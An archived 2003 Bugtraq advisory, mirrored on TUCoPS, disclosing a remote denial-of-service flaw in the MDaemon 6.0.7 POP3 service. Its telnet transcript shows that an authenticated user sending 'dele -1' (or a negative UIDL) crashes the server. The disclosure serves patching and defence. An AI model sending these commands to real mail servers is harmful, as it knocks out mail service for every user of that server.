Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: bt1466.txt

MDaemon SMTP/POP/IMAP server: =>6.0.7: POP remote DoS






----- Original Message ----- 
From: "D4rkGr3y" <grey_1999@mail.ru>
To: <bugtraq@security.nnov.ru>; <bugtraq@securityfocus.com>
Sent: Saturday, April 26, 2003 7:11 PM
Subject: MDaemon SMTP/POP/IMAP server: =>6.0.7: POP remote DoS


> -----BEGIN PGP SIGNED MESSAGE-----
> 
> ########################################################*
> #       Damage Hacking Group security advisory
> #                   www.dhgroup.org
> ########################################################*
> #Product: MDaemon SMTP/POP/IMAP server =>v.6.0.7
> #Authors: Alt-N Technologies [www.mdaemon.com]
> #Vulnerability: remote DoS via POP3 service
> ########################################################*
> 
> #Overview#-----------------------------------------------------#
> - From help-file:
> "MDaemon Server v6 brings SMTP/POP/IMAP and MIME mail services
> commonplace on UNIX hosts and the Internet to Windows based servers
> and microcomputers. MDaemon is designed to manage the email needs
> of any number of individual users and comes complete with a powerful
> set of integrated tools for managing mail accounts and message
> formats.
> MDaemon offers a scalable SMTP, POP3, and IMAP4 mail server complete
> with LDAP support, an integrated browser-based email client, content
> filtering, spam blockers, extensive security features, and more."
> 
> #Problem#------------------------------------------------------#
> 
> >telnet 127.0.0.1 110
> 
> +OK dark POP MDaemon ready using UNREGISTERED SOFTWARE 6.0.7
> <MDAEMON-F200303080
> 224.AA2418601MD5635@dark>
> user dark
> +OK dark... Recipient ok
> pass ******
> +OK dark@dark's mailbox has 13 total messages (2274775 octets).
> dele -1
> 
> Connection to host lost.
> 
> ...and MDaemon is crashed. This bug (with negative digits) is
> founded in UIDL and DELE commands and it could be used by authorized
> users only.
> 
> #Exploit#------------------------------------------------------#
> 
> \* use telnet ;P *\
> 
> 
> Best regards               www.dhgroup.org
>   D4rkGr3y                    icq 540981
> 
> -----BEGIN PGP SIGNATURE-----
> Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>
> 
> iQCVAwUBPqtKZ24LIpseSJmPAQHWhQQAjLj+sAngFcInBvHaRlUplVCJKmsX1XNV
> K7ffaV4vWNRIGXye+cj4I6OQfX2lHp8Xdy0JJNNqtjMuFVzAqwl3XOwtzJOYIOaq
> cAlq/zCr68E9EhcRen8os1JfxgJPZkXk931uJv42aHznNdAExULS6JBBL+bWSByz
> 4M1wMejQETA=
> =fkU8
> -----END PGP SIGNATURE-----
> 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH